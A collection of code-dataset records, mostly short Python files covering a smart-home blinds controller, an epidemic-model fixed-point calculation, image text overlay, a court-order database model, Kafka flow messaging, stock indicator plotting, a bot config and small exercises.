time.sleep(0.1)\n\n def __handleRelayActive(self, blindAction: BlindAction, blind: Blind):\n # Forward the signal to the GPIO Client\n self.__relayActiveActions[blindAction]()\n\n # Store the timestamp when the up signal was initiated\n # to detect if the blind is all the way up\n if blindAction in (BlindAction.Blind1Up,\n BlindAction.Blind2Up,\n BlindAction.Blind3Up,\n BlindAction.Blind4Up,\n BlindAction.Blind5Up,\n BlindAction.AllUp,\n BlindAction.AllUp2):\n self.__blindUpTimer[blind] = datetime.datetime.now()\n\n def __handleRelayInactive(self, blindAction: BlindAction, blind: Blind):\n # Forward the signal to the GPIO Client\n self.__relayInactiveActions[blindAction]()\n\n # If the up signal was sent for more than 2 seconds the blind is up\n if blindAction in (BlindAction.Blind1Up,\n BlindAction.Blind2Up,\n BlindAction.Blind3Up,\n BlindAction.Blind4Up,\n BlindAction.Blind5Up,\n BlindAction.AllUp,\n BlindAction.AllUp2):\n blindUp: bool = (datetime.datetime.now() -\n self.__blindUpTimer[blind]).total_seconds() > 2\n\n self.__blindUp[blind] = blindUp\n\n # Change all values in case the group all is triggered\n if (blindAction == BlindAction.AllUp or\n blindAction == BlindAction.AllUp2):\n for group in Blind:\n self.__blindUp[group] = blindUp\n\n # Store that not all blinds are at top\n else:\n self.__blindUp[blind] = False\n\n # Change all values in case the group all is triggered\n if (blindAction == BlindAction.AllDown or\n blindAction == BlindAction.AllDown2):\n for group in Blind:\n self.__blindUp[group] = False\n\n def __blockAutomationWhenAllAreUp(self):\n # Ensure all 5 blinds are registered\n if Blind.Blind1 not in self.__blindUp:\n return\n if Blind.Blind2 not in self.__blindUp:\n return\n if Blind.Blind3 not in self.__blindUp:\n return\n if Blind.Blind4 not in self.__blindUp:\n return\n if Blind.Blind5 not in self.__blindUp:\n return\n\n # Ensure all 5 blinds are up\n if not self.__blindUp[Blind.Blind1]:\n return\n if not self.__blindUp[Blind.Blind2]:\n return\n if not self.__blindUp[Blind.Blind3]:\n return\n if not self.__blindUp[Blind.Blind4]:\n return\n if not self.__blindUp[Blind.Blind5]:\n return\n\n # All blinds are up\n # Block the automation\n 
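# (only reached when all five blinds are registered and confirmed up by the checks above)\n        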
self.__gpioClient.block()\n","sub_path":"src/smart_home/BlindsService.py","file_name":"BlindsService.py","file_ext":"py","file_size_in_byte":10677,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"426870678","text":"import numpy as np\nimport math\nfrom sympy import solve, Symbol, latex, simplify, symbols, Matrix\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n\n# Symbolically find fixpts\nalpha, beta, S, I, N = symbols('alpha beta S I N')\ndSdt = -alpha*S*I/(I+S) + beta*I\ndIdt = alpha*S*I/(I+S) - beta*I\ndIdt_simple = alpha*(N-I)*I/N - beta*I\nsol = solve([dSdt,dIdt],[S,I])\nsol_2 = solve(dIdt_simple, I)\nprint(sol)\nprint(sol_2)\n\n# Bio relevant fp\nsol_bio = sol[1]\nprint(sol_bio)\n\n# Get Jacobian\nX = Matrix([S, I])\nY = Matrix([dSdt, dIdt])\nJ = Y.jacobian(X)\n\n# Get eigs\neigs = list(J.eigenvals().keys())\nprint('eigs' + str(eigs))\n\n# Linear dependence in eqts, use relevant eig..\nprint('eigs2' + str(simplify(eigs[0].subs([(S,sol_bio[0]),(I,sol_bio[1])]))))\n\n\nprint()\n\n\n# Print for latex\n#for j in range(len(sol)):\n    #print('(S^*_%i,I^*_%i)&='%(j+1,j+1) + str(latex(sol[j])) + '\\\\\\\\')\n#    print(sol[j])\n","sub_path":"2_a.py","file_name":"2_a.py","file_ext":"py","file_size_in_byte":897,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"226911369","text":"#!/usr/bin/env python\n\n'''\nThe first line of a script simply tells the operating system which interpreter should run the code in this file - that is all it does.\n\n#!/usr/bin/python tells the OS to invoke the python interpreter under /usr/bin when executing this script;\n#!/usr/bin/env python protects against python not being installed at the default /usr/bin path: when the system sees this line it first looks up python's install location via the env settings, then invokes the interpreter found at that path.\n#!/usr/bin/python effectively hard-codes the python path;\n#!/usr/bin/env python looks the python directory up from the environment settings, which is the recommended form\n'''\n\n#show me the code(python version)\n\n#No.000 add a number to the top-right corner of an image\n\n#2017-01-11 Rae Zhang\n\nimport string\nimport PIL\nfrom PIL import ImageFont,ImageDraw,Image\nimport random\n\n#set the overlay text\nimgNum=str(\"惊呆了\")\n\n#Read image\nim_file=\"/home/mingrui/图片/惊呆了\"\nim=Image.open(im_file)\nw,h=im.size\nwDraw=0.4*w\nhDraw=0.7*h\n\n#Draw image\n\nfont=ImageFont.truetype('SIMYOU',400)\n#set the font and its size; the font files live in /home/mingrui/下载/xmind-8-linux/fonts\ndraw=ImageDraw.Draw(im)\ndraw.text((wDraw,hDraw),imgNum,font=font,fill=(200,200,200))\n\n#save image\nim.save('惊呆了.jpg','jpeg')\n#note that the full name of the jpg format is jpeg (the second argument)\n","sub_path":"0000/000.py","file_name":"000.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"396253790","text":"# Copyright © 2019 Province of British Columbia\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\"\"\"This module holds data for amendment, renewal statement court order 
information.\"\"\"\n\n __tablename__ = 'court_orders'\n\n id = db.Column('id', db.Integer, db.Sequence('court_order_id_seq'), primary_key=True)\n order_date = db.Column('order_date', db.DateTime, nullable=False)\n court_name = db.Column('court_name', db.String(256), nullable=False)\n court_registry = db.Column('court_registry', db.String(64), nullable=False)\n file_number = db.Column('file_number', db.String(20), nullable=False)\n effect_of_order = db.Column('effect_of_order', db.String(512), nullable=True)\n\n # parent keys\n registration_id = db.Column('registration_id', db.Integer, db.ForeignKey('registrations.id'), nullable=False,\n index=True)\n\n # Relationships - Registration\n registration = db.relationship('Registration', foreign_keys=[registration_id],\n cascade='all, delete', uselist=False)\n\n @property\n def json(self) -> dict:\n \"\"\"Return the court_order as a json object.\"\"\"\n court_order = {\n 'courtName': self.court_name,\n 'courtRegistry': self.court_registry,\n 'fileNumber': self.file_number,\n 'orderDate': format_ts(self.order_date)\n }\n if self.effect_of_order:\n court_order['effectOfOrder'] = self.effect_of_order\n\n return court_order\n\n @classmethod\n def find_by_id(cls, court_order_id: int = None):\n \"\"\"Return an expiry object by expiry ID.\"\"\"\n expiry = None\n if court_order_id:\n expiry = cls.query.get(court_order_id)\n\n return expiry\n\n @classmethod\n def find_by_registration_id(cls, registration_id: int = None):\n \"\"\"Return a list of expiry objects by registration number.\"\"\"\n expiry = None\n if registration_id:\n expiry = cls.query.filter(CourtOrder.registration_id == registration_id).one_or_none()\n\n return expiry\n\n @staticmethod\n def create_from_json(json_data, registration_id: int = None):\n \"\"\"Create a court order object from a json schema object: map json to db.\"\"\"\n court_order = CourtOrder()\n if registration_id:\n court_order.registration_id = registration_id\n\n court_order.court_name = json_data['courtName']\n court_order.court_registry = json_data['courtRegistry']\n court_order.file_number = json_data['fileNumber']\n court_order.order_date = ts_from_date_iso_format(json_data['orderDate'])\n if 'effectOfOrder' in json_data:\n court_order.effect_of_order = json_data['effectOfOrder']\n\n return court_order\n","sub_path":"ppr-api/src/ppr_api/models/court_order.py","file_name":"court_order.py","file_ext":"py","file_size_in_byte":3545,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"563803204","text":"# Copyright 2017 Telstra Open Source\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport time\nimport json\nfrom kafka import KafkaProducer\n\nfrom logger import get_logger\n\nimport config\n\nproducer = KafkaProducer(bootstrap_servers=config.KAFKA_BOOTSTRAP_SERVERS)\nlogger = get_logger()\n\n\ndef get_timestamp():\n return int(round(time.time() * 1000))\n\n\nclass Flow(object):\n def to_json(self):\n return json.dumps(\n self, default=lambda o: o.__dict__, 
sort_keys=False, indent=4)\n\n\ndef build_ingress_flow(path_nodes, src_switch, src_port, src_vlan,\n bandwidth, transit_vlan, flow_id, output_action,\n cookie, meter_id):\n output_port = None\n\n for path_node in path_nodes:\n if path_node['switch_id'] == src_switch:\n output_port = int(path_node['port_no'])\n\n if not output_port:\n raise ValueError('Output port was not found for ingress flow rule',\n \"path={}\".format(path_nodes))\n\n flow = Flow()\n flow.command = \"install_ingress_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = src_switch\n flow.input_port = src_port\n flow.output_port = output_port\n flow.input_vlan_id = src_vlan\n flow.transit_vlan_id = transit_vlan\n flow.output_vlan_type = output_action\n flow.bandwidth = bandwidth\n flow.meter_id = meter_id\n\n return flow\n\n\ndef build_egress_flow(path_nodes, dst_switch, dst_port, dst_vlan,\n transit_vlan, flow_id, output_action, cookie):\n input_port = None\n\n for path_node in path_nodes:\n if path_node['switch_id'] == dst_switch:\n input_port = int(path_node['port_no'])\n\n if not input_port:\n raise ValueError('Input port was not found for egress flow rule',\n \"path={}\".format(path_nodes))\n\n flow = Flow()\n flow.command = \"install_egress_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = dst_switch\n flow.input_port = input_port\n flow.output_port = dst_port\n flow.transit_vlan_id = transit_vlan\n flow.output_vlan_id = dst_vlan\n flow.output_vlan_type = output_action\n\n return flow\n\n\ndef build_intermediate_flows(switch, match, action, vlan, flow_id, cookie):\n # output action is always NONE for transit vlan id\n\n flow = Flow()\n flow.command = \"install_transit_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = switch\n flow.input_port = match\n flow.output_port = action\n flow.transit_vlan_id = vlan\n\n return flow\n\n\ndef build_one_switch_flow(switch, src_port, src_vlan, dst_port, dst_vlan,\n bandwidth, flow_id, output_action, cookie,\n meter_id):\n flow = Flow()\n flow.command = \"install_one_switch_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = switch\n flow.input_port = src_port\n flow.output_port = dst_port\n flow.input_vlan_id = src_vlan\n flow.output_vlan_id = dst_vlan\n flow.output_vlan_type = output_action\n flow.bandwidth = bandwidth\n flow.meter_id = meter_id\n\n return flow\n\n\ndef build_delete_flow(switch, flow_id, cookie, meter_id=0):\n flow = Flow()\n flow.command = \"delete_flow\"\n flow.transaction_id = 0\n flow.flowid = flow_id\n flow.cookie = cookie\n flow.switch_id = switch\n flow.meter_id = meter_id\n\n return flow\n\n\nclass Message(object):\n def to_json(self):\n return json.dumps(\n self, default=lambda o: o.__dict__, sort_keys=False, indent=4)\n\n\ndef send_message(payload, correlation_id, message_type, destination=\"WFM\"):\n message = Message()\n message.payload = payload\n message.type = message_type\n message.destination = destination\n message.timestamp = get_timestamp()\n message.correlation_id = correlation_id\n kafka_message = b'{}'.format(message.to_json())\n logger.debug('Send message: topic=%s, message=%s', config.KAFKA_TOPIC,\n kafka_message)\n message_result = producer.send(config.KAFKA_TOPIC, kafka_message)\n message_result.get(timeout=5)\n\n\ndef send_error_message(correlation_id, error_type, error_message,\n error_description, destination=\"WFM\"):\n data = {\"error-type\": 
error_type,\n            "error-message": error_message,\n            "error-description": error_description}\n    send_message(data, correlation_id, \"ERROR\", destination)\n\n\ndef send_install_commands(flow_rules, correlation_id):\n    for flow_rule in flow_rules:\n        send_message(flow_rule, correlation_id, \"COMMAND\")\n\n\ndef send_delete_commands(nodes, flow_id, correlation_id, cookie):\n    for node in nodes:\n        data = build_delete_flow(str(node['switch_id']), str(flow_id), cookie)\n        send_message(data, correlation_id, \"COMMAND\")\n","sub_path":"services/topology-engine/queue-engine/topologylistener/message_utils.py","file_name":"message_utils.py","file_ext":"py","file_size_in_byte":5433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"354776629","text":"from typing import List\n\n\nclass Solution:\n    def containsDuplicate(self, nums: List[int]) -> bool:\n        return sets(nums)\n        # return sort(nums)\n\n\ndef sets(nums: List[int]) -> bool:\n    # 136 ms\t19.2 MB\n    if len(nums) <= 1:\n        return False\n\n    unique = set()\n    for _, num in enumerate(nums):\n        if num in unique:\n            return True\n        unique.add(num)\n    return False\n\n\ndef sort(nums: List[int]) -> bool:\n    # 124 ms\t19.1 MB\n    length = len(nums)\n    if length <= 1:\n        return False\n\n    nums = sorted(nums)\n    prev = nums[0]\n    for i in range(1, length):\n        if prev == nums[i]:\n            return True\n        prev = nums[i]\n    return False\n","sub_path":"python/217.py","file_name":"217.py","file_ext":"py","file_size_in_byte":691,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"533553858","text":"'''HW4 Part D1\n   Author: Bianca Yang\n   This module uses the draw_square function to draw four different colored\n   squares in the corners of an 800x800 canvas.'''\n \nfrom Tkinter import * \n\ndef draw_square(canvas, color, size, center):\n    '''Draws a square of the given size and color on the given canvas at\n    the given coordinates.'''\n    corner1 = (center[0]-size/2, center[1]-size/2)\n    corner2 = (center[0]+size/2, center[1]+size/2)\n    canvas.create_rectangle(corner1[0], corner1[1], corner2[0], \\\n        corner2[1], fill=color, outline=color)\n\nif __name__ == '__main__':\n    root = Tk()\n    root.geometry('800x800')\n    c = Canvas(root, width=800, height=800)\n    c.pack()\n    draw_square(c, 'red', 100, (50, 50))\n    draw_square(c, 'blue', 100, (50, 750))\n    draw_square(c, 'green', 100, (750, 50))\n    draw_square(c, 'yellow', 100, (750, 750)) \n    root.mainloop()\n","sub_path":"lab4_d2.py","file_name":"lab4_d2.py","file_ext":"py","file_size_in_byte":1001,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"82389613","text":"import numpy as np\nimport pandas as pd\nfrom datetime import datetime, timedelta\n\nimport SpectralAnalysis \n\nimport base\nimport simple_indices.RSI\nimport simple_indices.KD\nimport simple_indices.MACD\n\nimport validate.validate\nimport strategy.KD_simple\nimport strategy.MACD_simple\n\nimport argparse\nimport matplotlib.transforms as transforms\n\nparser = argparse.ArgumentParser(description='Simple analysis of a given stock tick symbol.')\nparser.add_argument('--symbol', type=str, help=\"Symbol of the stock\", required=True) \nparser.add_argument('--database', type=str, help=\"Folder name of the database (in the folder `database`)\", required=True) \nparser.add_argument('--window', type=int, help=\"Window in days\", default=365*3-1) \nparser.add_argument('--begin', type=str, help=\"Date of begin\", default=\"\") \nparser.add_argument('--end', 
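# [Illustrative addition - not part of the original dataset records.]
# The message_utils.py record above serializes plain objects through
# json.dumps(..., default=lambda o: o.__dict__). A minimal sketch of why that
# default also handles a Message whose payload is a Flow (class names mirror
# the record; the field values here are made up):
import json

class Flow(object):
    pass

class Message(object):
    def to_json(self):
        return json.dumps(self, default=lambda o: o.__dict__, sort_keys=False, indent=4)

flow = Flow()
flow.command = "install_transit_flow"
flow.flowid = "flow-1"

message = Message()
message.payload = flow  # nested object: json.dumps falls back to its __dict__
message.type = "COMMAND"
print(message.to_json())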
type=str, help=\"Date of end\", default=base.d2s(base.today00am())) \nargs = parser.parse_args()\n\ntarget_ticker = args.symbol\ndatabase = \"database/%s\" % args.database\n\nwindow_days = args.window\n\ninput_file = \"%s/%s.csv\" % (database, target_ticker)\n\nprint(\"Target ticker: %s\" % (target_ticker,))\n\n\ndf = pd.read_csv(input_file)\n\nend_date = base.s2d(args.end)\n\nif args.begin == \"\":\n print(\"Use --window\")\n beg_date = end_date - timedelta(days=window_days)\nelse:\n print(\"Use --begin\")\n beg_date = base.s2d(args.begin)\n\n\nprint(\"Selection beg date: %s\" % (base.d2s(beg_date),))\nprint(\"Selection end date: %s\" % (base.d2s(end_date),))\n\ndf = df.loc[(df[\"Date\"] >= base.d2s(beg_date)) & (df[\"Date\"] <= base.d2s(end_date))]\n\nlow_prices = df['Low'].to_numpy()\nhigh_prices = df['High'].to_numpy()\nclose_prices = df['Close'].to_numpy()\n\ndates = df['Date'].to_numpy()\n\ntimestamps = np.array([base.s2d(dates[i]).timestamp() for i in range(len(dates))])\n\nrsi = simple_indices.RSI.calRSI(close_prices, 14)\nK, D = simple_indices.KD.calKD(close_prices, high_prices, low_prices)\n\nMACD, SIG, EMA_fast, EMA_slow = simple_indices.MACD.calMACD(close_prices, w=2)\n\n#strategy = strategy.KD_simple.strategy_KD_simple()\nstrategy = strategy.MACD_simple.strategy_MACD_simple()\nprofit, transactions = validate.validate.validate_single_share(timestamps, close_prices, high_prices, low_prices, 60, strategy)\n\nprint(\"Profit: %.2f\" % (profit, ))\n\ninterp_timestamps, interp_dates = base.fill_date(beg_date, end_date)\n\nif len(interp_dates) % 2 != 0:\n interp_dates = interp_dates[1:]\n interp_timestamps = interp_timestamps[1:]\n\ninterp_close_prices = base.fill_data(interp_timestamps, timestamps, close_prices)\ninterp_low_prices = base.fill_data(interp_timestamps, timestamps, low_prices)\ninterp_high_prices = base.fill_data(interp_timestamps, timestamps, high_prices)\ninterp_rsi = base.fill_data(interp_timestamps, timestamps, rsi)\ninterp_K = base.fill_data(interp_timestamps, timestamps, K)\ninterp_D = base.fill_data(interp_timestamps, timestamps, D)\n\n\nif np.any(np.isnan(interp_close_prices)):\n raise Exception()\n\n# trend\n\nprice_ma = base.mavg(interp_close_prices, 91, method=\"center\") \nprices_anomaly = interp_close_prices - price_ma\ncoe = np.polyfit(interp_timestamps, prices_anomaly, deg=1)\nprices_detrended = prices_anomaly - (interp_timestamps * coe[0] + coe[1])\n\nvolatility = base.volatility(prices_detrended, 11, method=\"center\")\nvolatility_max = base.volatility_max(prices_detrended, 11, method=\"center\")\n\n# spectral\n\nlowpass_days = 30.0\n\ntruncate_wavenumber = int(np.ceil(len(prices_detrended)/lowpass_days))\n\ndata_filtered, pred, _, _ = SpectralAnalysis.DFT_filter(\n prices_detrended,\n truncate_wavenumber = truncate_wavenumber,\n)\n\nimport prediction.cyclic_1 as p_cyc1\n\n# predict\npred_N = 60\n\npred_dates = [ interp_dates[-1] + timedelta(days=i+1) for i in range(pred_N) ]\n\nprices_predicted, uncertainty = p_cyc1.predict(data_filtered, pred_N, n_per_cycle=60)\n\nimport matplotlib.pyplot as plt\nimport matplotlib.transforms as transforms\nimport matplotlib.dates as mdates\n\nplt.rcParams[\"date.autoformatter.month\"] = \"%y-%m-%d\"\n\nfig, ax = plt.subplots(5, 1, sharex=True, figsize=(12, 8))\n\nt = interp_dates\nt_raw = np.array([datetime.fromtimestamp(timestamps[i]) for i in range(len(timestamps))])\n\ntrans = transforms.blended_transform_factory(ax[0].transData, ax[0].transAxes)\nfor i in range(len(transactions) // 2):\n \n _buy = 
transactions[i*2]\n _sell = transactions[i*2+1]\n _profit = _sell.amount - _buy.amount\n\n if _profit > 0:\n color = \"green\"\n else:\n color = \"red\"\n\n ax[0].fill_between([datetime.fromtimestamp(_buy.time), datetime.fromtimestamp(_sell.time)], [0, 0], [1, 1], facecolor=color, alpha=0.2, transform=trans)\n\nfor transaction in transactions:\n marker = \"o\" if transaction.action == \"buy\" else \"x\"\n ax[0].scatter(datetime.fromtimestamp(transaction.time), transaction.amount, s=20, edgecolors=\"k\", facecolor=\"k\", marker=marker, zorder=99)\n #print(datetime.fromtimestamp(transaction.time), \": \", transaction.amount)\n\n\n\n\nax[0].fill_between(t, interp_low_prices, interp_high_prices, facecolor=\"#aaaaaa\", )\nax[0].plot(t, interp_close_prices, color=\"black\", linewidth=1)\nax[0].plot(t, price_ma, color=\"blue\", linestyle=\"dashed\", linewidth=1)\n\n\n\n#ax[1].fill_between(t, fluct_min, fluct_max, facecolor=\"#dddd55\", )\nax[1].fill_between(t, - volatility_max, volatility_max, facecolor=\"#dddd55\", )\nax[1].fill_between(t, - volatility, volatility, facecolor=\"#aaaa55\", )\nax[1].fill_between(t, interp_low_prices - price_ma, interp_high_prices - price_ma, facecolor=\"#aaaaaa\", )\nax[1].plot(t, prices_detrended, color=\"black\", linewidth=1)\nax[1].plot(t, data_filtered, color=\"red\", linewidth=1)\nax[1].plot(t, interp_timestamps * coe[0] + coe[1], color=\"green\", linewidth=1)\n\n\ntrans = transforms.blended_transform_factory(ax[2].transAxes, ax[2].transData)\nax[2].fill_between([0, 1], [30, 30], [70, 70], facecolor=\"#ffff88\", alpha=0.8, transform=trans)\nax[2].plot(t, interp_rsi, color=\"black\", linewidth=1)\n\nax[3].plot(t, interp_K, color=\"blue\", markersize=10, linewidth=1)\nax[3].plot(t, interp_D, color=\"red\", linewidth=1)\n\n\n\nDIF = MACD - SIG\ntwin = ax[4].twinx()\n#twin.bar(t_raw[pos_mask], MACD[pos_mask], color=\"green\", alpha=0.5)\n#twin.bar(t_raw[neg_mask], MACD[neg_mask], color=\"red\", alpha=0.5)\ntwin.fill_between(t_raw, DIF, where = DIF > 0, color=\"green\", alpha=0.5)\ntwin.fill_between(t_raw, DIF, where = DIF <= 0, color=\"red\", alpha=0.5)\n\n\nax[4].plot(t_raw, MACD, color=\"red\", linewidth=1)\nax[4].plot(t_raw, SIG, color=\"blue\", linewidth=1)\n#twin.plot(t_raw, EMA_fast - EMA_slow, color=\"gray\", linewidth=1)\n\n\n\nax[0].set_title(\"Ticker : %s (%s ~ %s)\" % (target_ticker, base.d2s(beg_date), base.d2s(end_date)))\nax[1].set_title(\"Detrended\")\nax[2].set_title(\"RSI\")\nax[3].set_title(\"KD\")\nax[4].set_title(\"MACD\")\n\n\nax[1].plot(pred_dates, prices_predicted, color=\"blue\", linestyle=\"dashed\", linewidth=1)\n\ntime_ticks = []\ntime_newyear_ticks = []\nfor y in range(beg_date.year, end_date.year + 1):\n\n time_ticks.extend([\n datetime(y, 1, 1),\n datetime(y, 4, 1),\n datetime(y, 7, 1),\n datetime(y, 10, 1),\n ])\n\n time_newyear_ticks.append(datetime(y, 1, 1))\n\n\nmyFmt = mdates.DateFormatter(\"%m/%d\")\nfor _ax in ax:\n _ax.set_xticks(time_ticks)\n _ax.xaxis.set_major_formatter(myFmt)\n _ax.grid(alpha=0.5)\n _ax.set_xlim([beg_date, pred_dates[-1] + timedelta(days=10)])\n _ax.set_xlabel(\"Date\")\n _ax.set_ylabel(\"Price\")\n\n trans = transforms.blended_transform_factory(_ax.transData, _ax.transAxes)\n for time_newyear_tick in time_newyear_ticks:\n _ax.text(time_newyear_tick, 0.95, \"%d\" % (time_newyear_tick.year,) , size=10, va=\"top\", ha=\"center\", 
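# [Illustrative addition - not part of the original dataset record.]
# SpectralAnalysis.DFT_filter used earlier in this script is project-local; a
# minimal numpy-only sketch of the same low-pass idea (keep the lowest
# truncate_wavenumber Fourier modes of the detrended series, zero the rest):
import numpy as np

def dft_lowpass(x, truncate_wavenumber):
    spec = np.fft.rfft(x)
    spec[truncate_wavenumber:] = 0.0  # drop the high-frequency modes
    return np.fft.irfft(spec, n=len(x))

t = np.linspace(0.0, 1.0, 256, endpoint=False)
noisy = np.sin(2.0 * np.pi * 3.0 * t) + 0.2 * np.random.randn(t.size)
smooth = dft_lowpass(noisy, truncate_wavenumber=8)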
transform=trans)\n\n\nplt.show()\n","sub_path":"lab/analysis_one_ticker.py","file_name":"analysis_one_ticker.py","file_ext":"py","file_size_in_byte":7645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"421869673","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n# Bot config\nBotAPIKey = 'xxx' # API Keythat you get from @BotFather\ntg = xxx # Your id, you can get it by sending command /id to bot @TONTgIDBot\nserverbotpath = '/home//serverbot' # User folder with this bot.\nserverbotpathdb = '/home//serverbot/db' # User folder with bot database. \nsrvping = '1.1.1.1' # Ping test server\ntraceroutetest = '1.1.1.1' # Traceroute test server\n\n# Server config \nmemloadalarm = 90 # RAM Utilization alarm starts at\npingcalarm = 50 # When ping will be more than X ms, you will get alarm.\ncpuutilalarm = 99 # CPU Utilization alarm starts at\nrepeattimealarmsrv = [5,15,25,30,60,90,120,180,320, 640, 1280, 2560, 5120, 10240, 20480, 40960, 81920] # Notify every x second about high CPU, RAM load and ping\ncfgAlertsNotificationsRam = 1 # RAM Monitoring + history\ncfgAlertsNotificationsCPU = 1 # CPU Monitoring + history\ncfgAlertsNotificationsping = 1 # RAM, Ping & CPU Monitopring\ncfgmonitoringnetwork = 1 # Netowrk Monitopring\ncfgmonitoringdiskio = 1 # Disk I/O Monitopring\n\n# Near config\nnearnetwork = 'betanet' # Choose your network - betanet/testnet/mainnet/guildnet\npoolname = 'xxx' # Your pool name\nsyncalarm = 50 # Blocks diff for alarm\nblocksdiff = 10 # Blocks produced VS expected alarm\nrepeattimealarmnode = [5,15,25,30,60,90,120,180,320, 640, 1280, 2560, 5120, 10240, 20480, 40960, 81920] # Notify every x second about validator node issues\ncfgAlertsNotificationsNode = 1 # Node pid monitoring\ncfgAlertsNotificationsSync = 1 # Sync status monitoring\ncfgAlertsNotificationsBlocks = 1 # Blocks produced VS expected monitoring\n","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"475627177","text":"# -*- encoding: utf-8 -*-\n\"\"\"\n@File : test_collection.py\n@Time : 2021/6/20 9:06\n\"\"\"\nimport pytest\nfrom common.mainTest import BaseRequests as R\nfrom tests.test_project_01 import *\n\n\n# from config.setting import *\n\n\n@pytest.mark.datafile(yaml_dir + 'test_demo.yaml')\ndef test_(parameters: dict):\n url = TEST_HOST + parameters.pop(\"url\")\n method = parameters.pop(\"method\")\n case_desc = parameters.pop(\"case_desc\")\n variables = parameters.pop('jsonpath_exp')\n verification = parameters.pop('verification')\n R.send_request(method, url, case_desc=case_desc, verification=verification, jsonpath_exp=variables, **parameters)\n\n\nif __name__ == '__main__':\n pytest.main(['-s', '-k', 'test_.py'])\n","sub_path":"apitest/tests/test_project_01/test/test_.py","file_name":"test_.py","file_ext":"py","file_size_in_byte":713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"644861801","text":"from terminaltables import SingleTable\n\n\nclass Border:\n\tdef __init__(self, w, h, title='Game board'):\n\t\tself.w = w\n\t\tself.h = h\n\t\tself.title = title\n\t\tself.m = [['']*(w+1) for i in range(h+1)]\n\t\tself.createIndexies()\n\t\n\tdef createIndexies(self):\n\t\tfor i in range(self.w):\n\t\t\tself.m[0][1+i] = chr(ord('A')+i)\n\t\t\tself.m[1+i][0] = i + 1\n\t\n\tdef draw(self):\n\t\tt = SingleTable(self.m, self.title)\n\t\tt.outer_border = 
True\n\t\tt.inner_row_border = True\n\t\tt.inner_column_border = True\n\t\tprint(t.table)\n\t\n\tdef set(self, cs, val):\n\t\tcs = cs.upper()\n\t\tx = ord(cs[0]) - ord('A') + 1\n\t\ty = int(cs[1:])\n\t\tself.m[y][x] = val\n\t\t\n\ndef main():\n\ttd = [\n\t[' ', 'A', 'B', 'C'],\n\t['1', 'X', ' ', 'O'],\n\t['2', 'O', 'X', ' '],\n\t['3', 'O', ' ', 'X']\n\t]\n\t\n\tt = SingleTable(td, 'GameBoard')\n\tt.outer_border = False\n\tt.inner_row_border = True\n\tt.inner_column_border = True\n\t\n\tprint(t.table)\n\t\n\tb = Border(5, 5)\n\tb.draw()\n\tb.set('a1', 'x')\n\tb.set('d4', 'o')\n\tb.draw()\n\t\n\nif __name__ == '__main__':\n\tmain()\n\n","sub_path":"archive/06.06.19 4:10/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"197184072","text":"slownik = {\n \"jeden\": \"I\",\n \"dwa\": \"II\",\n \"trzy\": \"III\",\n \"cztery\": \"IV\",\n \"piec\": \"V\",\n \"szesc\": \"VI\",\n \"siedem\": \"VII\",\n \"osiem\": \"VIII\",\n \"dziewiec\": \"IX\",\n \"dziesiec\": \"X\"\n}\n \nfor x, y in slownik.items():\n print(x, y)","sub_path":"zad15.py","file_name":"zad15.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"399234251","text":"def judge_anagram(str1 , str2):\n list_str1 = [char for char in str1]\n list_str2 = [char for char in str2]\n '''\n list_str1.sort\n list_str2.sort\n print(list_str1)\n print(list_str2)\n '''\n if sorted(list_str1) == sorted(list_str2):\n return True\n else:\n return False\n\nif __name__ == \"__main__\":\n print(judge_anagram(\"hoge\",\"geho\"))\n\n","sub_path":"Chapter1/module/judge_anagram.py","file_name":"judge_anagram.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"101711788","text":"from django.urls import path\nfrom curriculo import views\n\napp_name = 'curriculo'\n\nurlpatterns = [\n path('/', views.curso, name=\"curso\"),\n path('/disciplina//', views.disciplina, name=\"disciplina\")\n\n\n\n\n] 